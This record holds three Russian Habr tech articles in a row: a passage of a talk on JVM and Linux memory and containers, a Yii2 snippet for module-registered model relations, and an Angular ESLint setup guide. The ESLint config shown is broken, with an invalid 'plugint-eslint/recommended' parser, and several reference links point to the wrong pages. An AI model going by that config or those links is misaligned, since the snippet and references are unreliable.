И эта память не классифицируется по нашей схеме, а просто является памятью, выделенной стандартными средствами C Runtime. C ней тоже иногда бывают проблемы, причём на достаточно ровном месте.
Например, вот у нас java код распространяется в jar виде. Jar — это zip-архив, для работы с ним используется библиотека zlib. Для того, чтобы что-то разархивировать zlib надо аллоцировать буфер, который будет использован для декомпрессии и, конечно, для него требуется память. Всё бы ничего, но сейчас есть мода на так называемые uber-jar, когда создается один здоровенный jar, и возникают нюансы.
При попытке старта из такого jar-файла открывается одновременно слишком много потоков zlib на распаковку. Причём с точки зрения Java всё хорошо: куча маленькая, все области маленькие, но потребление памяти процессом растёт. Это, конечно же «клинический» случай, но такие потребности JVM надо принимать ао внимание. Например, если вы установили -Xmx в 1 Гбайт, посадили Java в Docker-контейнер и поставили лимит памяти на контейнер тоже в 1 Гбайт, то **JVM в него не поместится**. Надо ещё чуть-чуть накинуть, а сколько точно — зависит от многих факторов, в том числе от количества потоков и от того, что именно ваш код делает.
Итак, это то, как JVM работает с памятью.
Теперь, так сказать, для другой части аудитории.
Память в Linux
--------------
В Linux нет никакого **сборщика мусора**. Его работа с точки зрения **памяти** совершенно другая. У него есть **физическая память**, которая разбита на **страницы**; есть **процессы**, у которых есть своё **адресное пространство**. Ему надо ресурсы этой памяти в виде страниц как-то разделить между процессами, чтобы они работали в своём виртуальном адресном пространстве и делали своё дело.

Размер страницы — обычно 4 килобайта. На самом деле это не так, в архитектуре x86 уже очень давно существует поддержка больших страниц. В Linux она появилась относительно недавно, и с ней пока немножко непонятная ситуация. Когда поддержка больших страниц (Transparent Huge Tables) появилась в Linux, очень многие люди наступили на грабли, связанные с performance degradation из-за некоторых нюансов обслуживания больших страниц в Linux. И вскоре интернет заполнился рекомендациями выключать их от греха подальше. После этого какие-то баги, связанные с работой больших страниц в Linux, починили, но осадок остался.
Но на текущий момент нет чёткого понимания, например, с какой версии поддержку больших страниц можно включить по умолчанию и не беспокоиться.
> Поэтому будьте осторожны. Если вдруг на вашем Linux сервер внезапно на ровном месте вырастет потребление ресурсов ядром, то проблема может быть как раз в том, что у вас включены большие страницы, а сейчас они включены по умолчанию в большинстве дистрибутивов.
>
>
Итак, с точки зрения ядра у Linux есть **множество страниц**, которыми надо управлять. С точки зрения процесса — есть адресное пространство, в котором он резервирует диапазоны адресов. **Зарезервированное адресное пространство — это ничто, не ресурс, в нём ничего нет**. Если обратитесь по этому адресу, вы получите segfault, потому что там ничего нет.
Для того, чтобы в адресном пространстве появилась страница, нужен немножко другой syscall, и тогда процесс говорит операционной системе: «Мне, пожалуйста, в этих адресах нужен 1 Гбайт памяти». Но даже в этом случае память там появляется тоже не сразу и со своими хитростями.

С точки зрения ядра классификация страниц выглядит следующим образом, есть страницы:
a) **приватные**, то есть это значит, что они принадлежат одному процессу и доступны в адресном пространстве только одного процесса;
b) **анонимные** — это обычная память, не связанная в файлами;
c) **memory mapped files**— отображение файлов в память;
d) **используемые совместно**, которые могут быть либо:
* **Copy-On-Write**, то есть, при ветвлении процесса, память становится доступна обоим процессам до тех пор, пока не будет записана и страницы не превратятся в приватные;
* через **Shared** файл, т.е., если несколько процессов отображают в память один и тот же файл, то страницы могут использоваться совместно.
В общем, с точки зрения **ядра** операционной системы всё достаточно просто.

Просто, да не совсем.
Когда мы хотим понять, что происходит на сервере с точки зрения памяти, мы идём в top и видим там какие-то цифры. В частности, там есть **использованная память** и **свободная память**. Есть разные мнения насчет того, сколько должно быть свободной памяти на сервере. Кто-то думает, что это 5%, но, на самом деле, и **0% от физической памяти — также норма**, потому что то, что мы видим в качестве счётчика свободной памяти, — это в действительности не вся свободная память. Её на самом деле намного больше, просто она, как правило, скрыта в кэше страниц.
С точки зрения **процесса** top показывает три интересные колонки:
1. **virtual memory**;
2. **resident memory**;
3. **shared memory**.
Последняя память в списке — просто те страницы, которые являются совместно используемыми. А вот с **resident memory** всё немножко хитрее. Остановимся более подробно на этих метриках.

Как я уже сказал, используемая и свободная память, достаточно бесполезные метрики. У сервера ещё остается память, которая никогда не была использована, потому что у операционной системы есть **файловый кэш**, и все современные ОС всю свободную память используют под него, так как из файлового кэша страницу памяти всегда можно очистить и использовать для более важных задач. Поэтому **вся свободная память постепенно уходит в кэш и не возвращается обратно**.
Метрика **виртуальной памяти** —это вообще не ресурс с точки зрения операционной системы. Вы запросто можете аллоцировать 100 терабайт адресного пространства, и всё. Сделали это и можете гордиться, что с адреса X по адрес Y пространство зарезервировано, но не более. Поэтому смотреть на неё как на ресурс и, например, ставить алерт, что виртуальный размер процесса превысил какой-то порог, довольно бессмысленно.
Вернёмся к Java, она все свои специальные области резервирует заранее, потому что код JVM ожидает, что эти области будут непрерывными с точки зрения адресного пространства. А значит адреса надо застолбить заранее. В связи с этим, запуская процесс с кучей на 256 Мбайт, вы можете внезапно увидеть, что виртуальный размер у него больше двух гигабайт. Не потому, что эти гигабайты нужны и что JVM способна их когда-либо утилизировать, а просто дефолт такой. От него ни холодно, ни жарко, по крайне мере, так думали те, кто писал JVM. Это, правда, не всегда соответствует мнению тех, кто потом занимается поддержкой серверов.
**Residence size** — наиболее близкая к реальности метрика — это количество страниц памяти, которые используются процессом, находящимся в памяти, не в свопе. Но она тоже немножечко своеобразная.

### Кэш
Возвращаюсь к кэшу. Как я уже сказал, кэш — это, в принципе, **свободная память**, но иногда бывают исключения. Потому что страницы в кэше бывают чистые и грязные (содержащие не сохранённые изменения). Если страница в кэше модифицирована, то прежде, чем она может быть использована для другой цели, её сначала надо записать на диск. А это уже совсем другая история. Пример, JVM пишет большой-большой Heap Dump. Делает она это неспешно, процесс происходи так:
* JVM быстренько пишет в память;
* операционная система выдаёт ей всю свободную память, которая у неё есть, под write behind cache, вся эта память оказывается «грязной»;
* идет медленная запись на диск.
Если размер этого дампа сопоставим с размером физической памяти сервера, может возникнуть ситуация, что для всех остальных процессов свободной памяти просто не будет.
То есть у нас, например, открывается новая ssh-сессия — чтобы запустить shell-процесс, надо выделить память. Процесс идёт за памятью, а ядро говорит ему: «Подожди, пожалуйста, сейчас я что-нибудь найду». Находит, но прежде, чем оно успевает отдать эту страницу SSHD, Java успевает «запачкать» ещё несколько страниц, потому что она тоже «висит» в Page Fault и, как только появляется свободная страница, она быстренько успевает выхватить эту память раньше, чем какие-то другие процессы. На практике такая ситуация приводила, например, к тому, что система мониторинга просто решала, что этот сервер «не живой» раз зайти на него через ssh не получается. Но это, конечно, крайний случай.
Еще процесс в Linux помимо virtual size и resident size имеет **committed****size** — это та память, которую процесс реально собирается использовать, то есть это адресное пространство, при обращении к которому вы не получите segfault, при обращении к которому ядро обязано предоставить вам физическую страницу памяти.

В идеальной ситуации **committed и****re** **sident должны были быть одним и тем же**. Но, во-первых, страницы могут «свопиться».
Во-вторых, память в Linux выделяется всегда лениво.
* Вы говорите ему: «Дай мне, пожалуйста, 10 Гбайт». Он говорит: «Бери пожалуйста».
* Другой процесс: «Дай мне тоже 10 Гбайт» — «Бери пожалуйста».
* Третий процесс: «Дай мне тоже 10 Гбайт» — «Бери пожалуйста».
Потом оказывается, что физической памяти всего 16, а он всем раздал по 10. И начинается «кто первый взял, того и тапочки, а кому не повезло, за тем придёт OMKiller». Это особенности управления памятью Linux.
Важные факты о **JVM**
----------------------
Первое, **JVM очень не любит swapping**. Если мне жалуются, что java-приложение почему-то тормозит, то первое, что я делаю, это смотрю, нет ли на сервере своппинга. Потому что есть два фактора, делающих Java очень нетолерантной к свопингу:
1. Сборка мусора в Java постоянно бегает по страничкам, и если она «промахивается» мимо резидентных страниц, то вызывает перекладывание страниц с диска в память и обратно.
2. Если в JVM хотя бы один поток «наступил» на страницу, которой в памяти нет, то это может привести к заморозке **всех** потоков этой JVM.
Есть механизм **safe-point**, который используется в JVM для всякой чёрной магии вроде перекомпиляции кода на лету, сборки мусора и так далее. Если один поток попал на Page Fault и ждёт, то JVM не может нормально войти в состояние safe-point, потому что не получает подтверждение от потока, который ждёт «приезда» страницы памяти. А все остальные потоки уже остановились и тоже ждут. Все стоят, ждут один этот несчастный поток. Поэтому, как только у вас начинается пейджинг, может начаться очень существенная деградация производительности.
Второе, **Java никогда не отдаёт память операционной системе**. Она будет использовать столько, сколько вы разрешили, даже если ей сейчас не очень нужны эти ресурсы, она их обратно не отдаст. Есть сборщики мусора, которые технически умеют это делать, но не надо рассчитывать, что они будут это делать.
**У сборщика мусора такая логика работы: он либо использует больше**
**CPU, либо больше памяти.** Если вы ему разрешили использовать 10 Гбайт, значит он разумно предполагает, что можно экономить ресурсы CPU, а эти 10 гигабайт с мусором подождут, а CPU пока пусть лучше делает делает что-то полезное, вместо чистки памяти, которая ещё не выходит за лимит.
> В связи с этим важно правильно и обоснованно выставлять размер **JVM**. А если у вас несколько процессов в рамках одного контейнера, разумно распределять ресурсы памяти между ними.
>
>
Иначе пострадают все, что находится в этом контейнере.
Когда заканчивается память
--------------------------
Это еще одна из тех ситуаций, которыеочень по-разному воспринимаются «джавистами» и «линуксоидами».

В Java это происходит так: есть оператор new, который выделяет объект (на слайде это большой массив), если в куче недостаточно места, чтобы выделить память под этот большой массив, мы получаем Out of Memory error.

В Linux всё по-другому. Как мы помним, Linux легко может пообещать больше памяти, чем есть на самом деле, и вы начинаете с ней работать (выше условный код). И в отличии от JVM вы получите не ошибку, а аварийное завершение процесса выбранного OMKiller или смерть всего конейнера, если речь идёт о превышении квоты cgroups.
### Когда память заканчивается в JVM
Теперь, разберемся чуть подробнее. В Java у нас есть так называемая область молодых объектов и область старых. Когда мы вызываем оператор new, объект выделяется в пространстве молодых объектов. Если же место в пространстве молодых объектов закончилось, происходит либо **молодая**, либо **полная сборка мусора**, если молодой сборки недостаточно. Суть в том, что, во-первых, если у нас не хватает памяти, происходит сборка мусора. И прежде, чем произойдёт Out of Memory error пройдет по крайне мере одна полная сборка, т.е. такая неспешная через всю нашу десятигигабайтную кучу. В некоторых случаях она будет ещё и в один поток, потому что full GC — особый случай.

При этом сборщик мусора наверняка чего-нибудь да наскребёт. Но если этого чего-нибудь **меньше, чем 5% от размера кучи**, всё равно будет выброшена ошибка, потому что это уже «не жизнь, а сплошное мучение». Но если этот Out of Memory error произойдёт в потоке, автор кода которого решил, что его поток должен работать, не взирая на любые ошибки, он может эту агонию продлевать путём перехвата исключений.
Вообще, после того, как стрельнула Out of Memory error, JVM уже нельзя считать живой. Внутренне состояние уже может быть разрушено, и есть такая опция (`-XX:OnOutOfMemoryError="kill -9 %p"`), которая позволяет сразу убить этот процесс. Опять же есть нюансы. Если у вас размер JVM сопоставим с размером физической памяти бокса, то в момент вызова этой команды у вас произойдёт форк, который. приведёт к тому, что образ JVM будет продублирован. Соответственно, с точки зрения Linux память для JVM может немножечко превысить предел максимальной памяти, которую он готов выделить и эта команда не сработает. Такая проблема типична для Hadoop-серверов, например, когда большущий узел пытается запустить Python через shell. Естественно, этому дочернему процессу столько памяти не нужно, просто форк делает копию всего, а уже потом освобождает ненужную память. Только «потом» не всегда наступает.
Может быть другая ситуация, возможно, что **куча ещё не максимального размера** (меньше -Xmx), но сборка мусора не собрала достаточно памяти, и JVM решила, что надо **увеличить кучу**. Пошла к операционной системе, говорит: «дай мне больше памяти», а ОС говорит: «нет». Правда, как я уже сказал, Linux так не говорит, но другие системы говорят. Любая ошибка выделения памяти операционной системы с точки зрения JVM — это crash, без вопросов, никаких эксепшенов, никаких логов, только стандартный crash dump, и немедленное завершение процесса.
Есть ещё второй тип Out of Memory, который связан с так называемыми direct memory buffers. Это специальные объекты в Java, которые ссылаются на память вне кучи. Соответственно, они же её и аллоцируют, управляют жизненным циклом этой памяти, то есть определённая сборка мусора там всё равно есть. Чтобы такими буферами нельзя было занять бесконечно большое количество памяти, на них есть лимит, который JVM сама себе выставляет. Иногда возникает необходимость его подкорректировать, на что, естественно, есть магическая -XX опция, например, `-XX:MaxDirectMemorySize=16g`. В отличие от нормального Out of Memory этот Out of Memory — recoverable, потому что он возникает в определённом месте и его возможно отличить от другого типа ошибок.
Выделяем память в Java
----------------------
Как я уже говорил, JVM на старте важно знать, сколько вы ей позволите использовать памяти, потому что исходя из этого строятся все **эвристики сборщика мусора**.
Сколько выделять памяти «в граммах» — это вопрос сложный, но вот основные тезисы:
1. Вы должны понимать, сколько полезных объектов должны находиться в памяти постоянно (**Live** **set**). Это правильнее всего измерять эмпирически, то есть надо:
* производить тесты;
* делать **Heap Dump;**
* смотреть, из чего состоит куча и как она будет расти при увеличении числа запросов или количества данных.
2. **Молодое поколение** либо берётся по умолчанию в процентном отношении от кучи, либо выставляется динамически. Например, фишка **G1 collector** как раз в том, что он сам умеет правильно выбирать размер young space. Для остальных сборщиков мусора лучше его выставлять руками, опять же исходя из эмпирических соображений.
3. Сборщику мусора обязательно нужен **резерв**, так как для того, чтобы собирать мусор, он где-то должен в памяти быть. Чем больше у вас памяти под мусор, тем меньше CPU будет тратиться на 1 Гбайт освобождённой памяти. Этот баланс никогда нельзя «выкрутить в ноль». Размер резерва зависит от особенностей вашего приложения и используемого сборщика мусора, как правило, это **30–50%.**
4. Итого, общий размер вашей кучи (-Xmx) состоит из:
* размерамолодого поколения;
* размера live set;
* резерва.
Помимо кучи есть ещё direct buffers, какой-то резервJVM, который тоже надо определять эмпирически.
> Таким образом footprint процесса в целом всегда будет больше, чем -Xmx, причем это не просто какой-то процент, а сочетание различных факторов вроде количества потоков.
Выделяем память в Linux
-----------------------
Двигаемся дальше, в Linux есть такая штука как **ulimit** — это такая странная конструкция, на мой взгляд джависта. Для процесса есть набор квот, который задает операционная система. Квоты есть разные, на количество открытых файлов, что логично, и ещё на какие-то другие вещи.

Именно для управления ресурсами ulimits работают не очень — для того, чтобы ограничивать ресурс контейнера, используется другой инструмент. В ulimits есть максимальный размер памяти, который на Linux не работает, но там же есть ещё **максимальный размер виртуальной памяти.** Это такая интересная штука, потому что, как я уже говорил, виртуальная память — не ресурс. В принципе, от того, что я зарезервирую 100 Тбайт адресного пространства, операционной системе ни холодно ни жарко. Но ОС скорее всего не даст мне этого сделать, пока я для своего процесса не становлю соответствующий ulimit.
По умолчанию этот лимит есть и **может помешать запускаться вашей JVM**, особенно опять же если размер JVM сопоставим с физической памятью, потому что значение по умолчанию часто считается как раз от размера физической памяти. Это вызывает некоторое недоумение, когда, допустим, у меня на сервере 500 Гбайт, я пытаюсь запустить JVM на 400 Гбайт, а она просто падает на старте с какими-то непонятными ошибками. Потом выясняется, что JVM на старте выделяет себе все эти адресные пространства, и в какой-то момент ОС ей говорит: «Нет, что-то много ты брешь адресного пространства, мне жалко». И, как я уже сказал, в этом случае JVM просто «умирает». Поэтому иногда этот параметрам нужно не забыть настроить.
Бывают другие клинические ситуации, когда люди почему-то решают, что если у них для JVM на сервере выделено 20 Гбайт, то надо ей размер виртуального адресного пространства тоже выставить в 20 Гбайт. Это проблема, потому что некоторые участки памяти, которые JVM резервирует, никогда не будут использованы, и их достаточно много. Таким образом вы намного сильнее ограничиваете ресурсы памяти этого процесса, чем можете подумать.
> Поэтому обращаюсь к линуксоидам, пожалуйста, не делайте так, пожалейте своих джавистов.
>
>
Пару слов про Docker
--------------------
То есть не про сам Docker, а про управление ресурсами в контейнере. В Docker управление ресурсами для контейнеров работает через механизм **cgroups**. Это механизм ядра, который позволяет для дерева процессов ограничить всевозможные ресурсы, например CPU и память. В том числе для памяти можно ограничить размер резидентной памяти, занимаемой всем контейнером, количество swap, количество страниц и др. Эти лимиты, в отличие от ulimits, нормальные ограничения на весь контейнер; если процесс форкает какие-то дочерние процессы, то они попадают в ту же группу ограничения ресурсов.
Что важно:
1. Если вы запускаете Java в docker-контейнер, она смотрит, сколько на хосте физической памяти, и исходя из того, **сколько физической памяти реально на хосте, а не в контейнере** считает ограничения по умолчанию. И очень быстро умирает, потому что ей столько не дают. **Поэтому -Xmx обязательно — без этого не взлетит.**
2. Всегда **под контейнер надо давать немножко больше памяти, чем под** **JVM**. Допустим, вы делаете контейнер на 2 Гбайта, запускаете JVM с параметром `-Xmx2048m`, оно как-то начинает работать, потому что память аллоцируется лениво. Но потихонечку все эти страницы так или иначе начинают использоваться, и сначала ваш контейнер начинает уходить в локальный своп, а потом просто умирает. Причём умирает он в лучших традициях — **просто исчезает**.
Если оно просто стартовало, это ещё ничего не значит, потому что ресурсы выделяются реально лениво.
Потоки в Java
-------------
Про потоки в Java важно знать, что они — **нормальные потоки операционной системы**. Когда-то в первых JVM были реализованы так называемые green threads — зелёные потоки, когда на самом деле стек java-потока как-то жил своей жизнью, и один поток операционной системы выполнял то один java-поток, то другой. Это всё развивалось до тех пор, пока в операционных системах не появилась нормальная многопоточность. После этого все забыли «зелёные» потоки как страшный сон, потому что с нативными потоками код работает лучше.
Это значит, что stack trace на пол тысячи фреймов реально лежит в том пространстве стека, который выделила операционная система. Если вы вызываете какой-то нативный код из Java это код будет использовать тоже самый стек, что и java-код. Это означает возможность использования диагностического инструментария, который есть в Linux, для работы так же и с java-потоками.
### Как найти java**-**потоки

Если мы воспользуемся командой **ps** для JVM, мы увидим такую непонятную картину, потому что все потоки называются одинаково. Но на практике там в порядке очереди идут:
* потоки сборщика мусора;
* так называемый operational thread JVM;
* application потоки,
но это наугад.

На самом деле? если вы снимете thread dump с JVM с помощью команды**jstack**, то там будет шестнадцатеричное число **«TID» — это идентификатор реального линуксового потока**. То есть вы можете понять, какие java-потоки соответствуют каким потокам операционной системы и расшифровать ps.
Единственное, если вы уже видите, как напишете скрипт на perl, который будет это делать, **не вызывайте jstack в цикле**, лучше наоборот. Потому что каждый раз, когда вы вызываете jstack, вы вызываете глобальную паузу всех потоков JVM. В нормальных обстоятельствах это быстро, меньше, чем полмиллисекунды, но если делать такое 20 раз в секунду, то это уже может заметно отразится на производительности.
Можно, так же, вытащить эту информацию из самой JVM, в которой есть свой диагностический интерфейс. В частности, можете воспользоваться [моим инструментом](https://github.com/aragozin/jvm-tools), который оттуда эту информацию вытягивает и просто для **JVM** печатает топ по потокам. Помимо **CPU usa****ge** он ещё умеет печатать интенсивность аллокаций памяти кучи Java потоками.
### Итого о потоках

Java-потоки — это обычные потоки операционной системы. В современных версиях JVM есть ключ `PreserveFramePointer` — это опция JIT-компилятора, позволяющая инструментам типа perf корректно парсить стек Java потоков.
Также есть на GitHub [проект](https://github.com/jvm-profiling-tools/perf-map-agent), который позволяет экспортировать «на лету» символы для скомпилированного java-кода, и с помощью того же perf получать вполне читабельный стек вызовов.
И небольшое напоминание, что у нас есть ещё потоки сборщика мусора.
> Если у вас контейнер, на котором вы выделили два CPU, то надо количество параллельных потоков сборщика мусора тоже сделать два, потому что по умолчанию их будет больше, и они будут друг другу только мешать.
>
>
С другой стороны, в тот момент, когда работает сборщик мусора, все остальные потоки не делают ничего. Поэтому под сборщика мусора можно выделять 100% ресурсов контейнера, которые вы собираетесь выделить для Java.
IO и Networking
---------------
**Сетевому стеку в Linux нужен тюнинг**. Про это очень хорошо помнят те, кто занимается фронтенд-серверами, например, с Nginx, но то же самое неплохо бы делать на application и бэкенд-серверах — про это иногда забывают. И всё работает нормально до тех пор, пока у вас система становится геораспределенной и не начинается перегон данных через Атлантику. И упс, оказывается, надо было увеличить лимит на буферы.

Если вы используете UDP коммуникации, это тоже требует отдельной настройки на уровне операционной системы. Есть опции, которые код сам должен выставлять через API на сокетах, но они должны быть разрешены на уровне лимитов операционной системы. Иначе они просто не работают.
Второй интересный момент связан с особенностями работы с ресурсами в **JVM**.
У нас есть ограниченный ресурс — лимит на количество файлов, куда попадают сокеты и т.д., для процесса. Если у нас этот лимит превышен, то мы не можем:
* открывать соединение;
* открывать файлы;
* принимать соединения и т.д.
В Java на всех этих объектах есть методы для того, чтобы их явным образом закрывать и, соответственно, освобождать дескрипторы Linux.

Но если ленивый джавист этого не сделал, то сборщик мусора придёт и всё равно за него всё закроет. И всё бы хорошо, если бы этот сборщик мусора приходил по расписанию, но он приходит, когда посчитает нужным. Если у вас вся куча забита незакрытыми сокетами, то с точки зрения кучи это копейки, потому что там лежат только метаданные этого сокета и номер дескриптора из операционной системы. Поэтому если у вас есть вот такая комбинация внешних ресурсов, на которые ссылается java-код, то сборщик мусора иногда может вести себя не очень адекватно в этом плане.
> Соединения и файлы всегда надо закрывать руками.
>
>
Даже если у вас произошла ошибка на сокете, всё равно, после того как вы словили exception, сокет надо закрыть. Потому что с точки зрения операционной системы то, что она вернула вам код ошибки, и вы в Java получили exception, ещё не значит, что сокет закрыт. С точки зрения операционной системы он будет **продолжать считаться открытым**, и операционная система честно будет готова вернуть код ошибки снова при проверке следующего обращения к нему. Соответственно, если мы что-то неправильно сконфигурировали, а сокеты должным образом не закрываются, через какое-то время лимит на файлы закончится, и приложению станет совсем плохо.
Есть пара ресурсов в **JVM**, которые нельзя освободить явным образом:
* memory map файлы;
* NIO direct buffers.
Поэтому с ними надо работать аккуратно, и желательно не выбрасывать, а переиспользовать. С точки зрения диагностики у нас есть heap dump, из которого всю эту информацию можно вытащить.
И, наконец, последние напутствия.

Выставляйте правильный размер JVM. Сама JVM не знает, сколько памяти ей нужно взять.
Учитесь пользоваться инструментами, в Linux есть инструменты, которые достаточно неплохо работают с Java, в JDK есть инструменты, которые позволяют получать много информации именно через командную строку. В Java есть JMX (Java Management Extensions) диагностический интерфейс, но для того, чтобы с ним работать, нужен другой java-процесс, что не всегда удобно.
В частности, не забывайте, про сочетание инструментов. Например, если у вас есть Linux core dump JVM, то вы можете с помощью инструментов JDK вытащить из него heap dump для Java и посмотреть его уже нормальным джавовским анализатором вместо того, чтобы делать этот heap dump непосредственно с живого процесса.
И уже совсем напоследок несколько ссылок на разные темы.
Java Memory Tuning and Diagnostic:
* <http://blog.ragozin.info/2016/10/hotspot-jvm-garbage-collection-options.html>
* [https://docs.oracle.com/javase/8/docs/technotes/guides/troubleshoot/tooldescr007.html](https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/)
* Using JDK tools with Linux core dumps
[https://docs.oracle.com/javase/8/docs/technotes/guides/troubleshoot/bugreports004.html#CHDHDCJD](https://docs.oracle.com/javase/8/docs/technotes/guides/troubleshoot/bugreports004.html)
Linux Transparent Huge Pages reading:
* [https://www.perforce.com/blog/tales-field-taming-transparent-huge-pages-linux](https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/)
* [https://tobert.github.io/tldr/cassandra-java-huge-pages.html](https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/)
* <https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/>
Profiling and performance monitoring:
* <https://github.com/jvm-profiling-tools/perf-map-agent>
* <https://github.com/aragozin/jvm-tools>
Контакты:
* [https://blog.ragozin.info](https://blog.ragozin.info/)
* <https://github.com/aragozin>
Если у вас остались вопросы, то можно перескочить на соответствующую [часть](https://www.youtube.com/watch?v=HVVsjyVxcJ8&feature=youtu.be&t=2987) доклада, может быть, кто-то это уже уточнил.
> Короткое послесловие
>
>
>
> [РИТ++](http://ritfest.ru/moscow/2018/) уже 28 и 29 мая, расписание здесь, а это прямая [ссылка](https://conf.ontico.ru/conference/join/rit2018.html) на покупку билетов.
>
>
>
> До [Highload++ Siberia](http://www.highload.ru/siberia/2018/) времени чуть больше, она пройдет 25 и 26 июня. Но [программа](http://www.highload.ru/siberia/2018/abstracts) уже активно формируется, вы можете [подписаться](http://www.highload.ru/siberia/2018#subscribe_highload_siberia_2018) на рассылку и быть в курсе обновлений.
>
> | https://habr.com/ru/post/358520/ | null | ru | null |
# «Домашка» по Yii2
Не так давно был написан [пост](http://habrahabr.ru/post/254179/) о «подводных камнях ~~и ракушках~~», в котором было «домашнее задание» — ответ на которое так никто и не прислал, но думаю многие задавались вопросом — как все таки связывать модели из разных модулей. Хочу вам предложить вариант решения данной задачи.
«Наша банда» в составе 3 человек пытается решать интересные задачки на данном фреймворке, в очередной раз, в свободное время — сели мы значит за ~~кофе с печеньками~~ и стали проверять «смысловую нагрузку» поговорки —
> Одна голова — хорошо, но две лучше
В итоге у нас нарисовалась следующая «концепция по разработке зависимых модулей»:
**1. Регистрировать релейшены для моделей должны модули;
2. Релейшены должны храниться в статическом свойстве модели;
3. Возможность добавления релейшенов в обе стороны (как на модульную модель, так и в модульной модели — обратная);**

Добавление и хранение связей
----------------------------
```
protected static $relations = [];
public static function addRelation($name, $targetClass, $link, $multiple = false)
{
self::$relations[$name] = [$targetClass, $link, $multiple];
}
```
**...**Конечно же код не идеален (отсутствие php-doc), ну и многие задались сразу же вопросом — «а как быть с доп условиями (andWhere, orderBy, indexBy, ...)»? Но я, к сожалению не буду затрагивать в данной статье этот вопрос, т.к. это всего лишь наброски мыслей.
*Трейт решит проблему со статическим свойством — уникальным для класса модели.*
Создание связей
---------------
```
public function getRelation($name, $throwException = true)
{
if (isset(self::$relations[$name])) {
return $this->createRelation($name, $throwException);
}
return parent::getRelation($name, $throwException);
}
public function __get($name)
{
if (isset(self::$relations[$name]) && !$this->isRelationPopulated($name)) {
$related = $this->getRelation($name)->findFor($name, $this);
$this->populateRelation($name, $related);
return $related;
}
return parent::__get($name);
}
protected function createRelation($name, $throwException = true)
{
$relation = self::$relations;
if (!isset($relation[$name])) {
if (!$throwException) {
return null;
}
throw new InvalidCallException('Relation ' . $name . ' not find in class ' . get_class($this));
}
$relation = $relation[$name];
$class = array_shift($relation);
$query = $class::find();
$query->link = array_shift($relation);
$query->multiple = array_shift($relation);
$query->primaryModel = $this;
return $query;
}
```
подробнее смотрите [[yii\db\BaseActiveRecord::hasOne|hasMany]]
Объявление связей и их регистрация
----------------------------------
*в данном коде, рассмотрим пример из «домашки» — у пользователя несколько банковских аккаунтов (неймспейсы опустим для облегчения восприятия контента).*
```
public $relations = [
'User' => [
'bankAccounts' => ['BankAccount', ['user_id' => 'id'], true]
],
'BankAccount' => [
'user' => ['User', ['id' => 'user_id'], false]
],
];
protected function registerRelations()
{
foreach ($this->relations as $owner => $relations) {
foreach ($relations as $name => $relation) {
list ($targetClass, $link, $multiple) = $relation;
$owner::addRelation($name, $targetClass, $link, $multiple);
}
}
}
```
Здесь мог быть «вывод» или «итог», но данный хаб думаю в этом не нуждается, прошу прощение за малую информативность о том, как это работает — думаю тут все прозрачно.
Жду критики, вопросов, предложений.
В скором времени будет создано и опубликовано расширение в публичном доступе, об этом будет сообщено в данном хабе и на [русскоязычном yii форуме](http://yiiframework.ru/forum/viewforum.php?f=9)
п.с. родители в школу не пойдут — можете не вызывать | https://habr.com/ru/post/256685/ | null | ru | null |
# Создаем приложение Art-pixel на Angular и Nest.js. Часть 2.1 (ESLint)
В процессе разработки приложения, поскольку у нас не было четкого технического задания и видения, у нас возник некий технический долг в виде any, в этой статье мы постараемся это исправить. Для тех кто пропустил, [начало](https://habr.com/ru/post/647411/). И в этом нам поможет ESLint - утилита, которая может анализировать написанный код, она может находить синтаксические ошибки, баги или неточности форматирования.
По умолчанию версия Angular 12 не включает линтеры, потому что стандартный линтер TypeScript [TSLint](https://github.com/palantir/tslint) считается устаревшим и вместо него рекомендуется использовать ESLint.
Для начала использования:
Добавляем правила, для этого создаем новый файл "**.eslintrc**" в корневой папке со следующими значениями:
```
{
"parser": "plugint-eslint/recommended",
"extends": [
"plugint-eslint/recommended"
],
"parserOptions": {
"ecmaVersion": 2021,
"sourceType": "module"
},
"rules": {
// custom rules here
}
}
```
Где rules — набор eslint правил, parser — парсер, который будет валидировать содержимое файлов, plugins — набор подключаемых плагинов, которые не входят в стандартный набор eslint, extends — набор предустановленных рекомендаций, которые будут применяться.
Нам достаточно будет установленых по умолчанию правил, посмотреть какие правила сюда входят можно [здесь](https://eslint.org/docs/rules/), добавить свои правила можно [здесь](https://eslint.org/demo).
*Подробнее про все параметры eslint можно посмотреть в* [*официальной документации*](https://eslint.org/docs/user-guide/configuring)*.*
*Для тех, кто хочет понять как это работает* [*сюда*](https://astexplorer.net)*.*
теперь добавим в раздел script **package.json строку запуска линтера** "lint": "eslint "\*\*/\*.{ts,tsx}" "
```
"scripts": {
"ng": "ng",
"start": "ng serve",
"build": "ng build",
"watch": "ng build --watch --configuration development",
"test": "ng test",
"lint": "eslint \"**/*.{ts,tsx}\" "
},
```
Запускаем командой **npm run lint и смотрим на результат.**
очень много ошибок **Результат как видим не утешительный ✖ 42 problems (17 errors, 25 warnings)**
Чтобы не выбирать ошибки из консоли, для тех кто использует VS Code можно установить ESLint от Microsoft. ESLint подсветит критические ошибки красным, а предупреждения желтым. При наведении мы увидим подсказку, что конкретно нужно исправить.
Вот так выглядит подсветка ошибок в VS Code с плагином ESLint от MicrosoftКак видим ошибок очень много, но в основном они однотипные.
Например, 'cX' is never reassigned. Use 'const' instead - говорит о том, что нужно использовать const, а не let. Свойство "data" объявлено, но его значение не было прочитано, так гласит - 'data' is assigned a value but never used.
Кроме этого у нас есть неиспользуемые свойства и методы, например ngOnInit, constructor и т.д. Но самые страшные ошибки это конечно же нарушение использования типов. Например мы используем как пустой объект {}, что является ошибкой и нам подсказывают: Если вам нужен тип, означающий «любой объект», вам, нужно использовать `Record;` вместо {}. Если вам нужен тип, означающий «пустой объект», вы можете использовать `Record;` вместо {}.
На самом деле нам известны типы данных которые мы используем поэтому мы внесем изменения в наш canvas-post.interface.ts и добавим парочку интерфейсов.
Interface
```
export interface CanvasPostInterface {
_id?: string,
name: string;
image: string;
canvas: CanvasInterface;
}
export interface CanvasInterface {
innerHeight: number;
innerWidth: number;
numberOf: number;
backgroundColor: string;
data: [DataCanvasInterface];
}
export interface DataCanvasInterface {
x: number;
y: number;
color: string;
}
export interface CanvasMainFormInterface {
name?: string;
innerWidth: number;
innerHeight: number;
widthRect: number;
heightRect: number;
numberOf: number;
borderRow: number;
numberRow: number;
colorfillStyle: string;
}
```
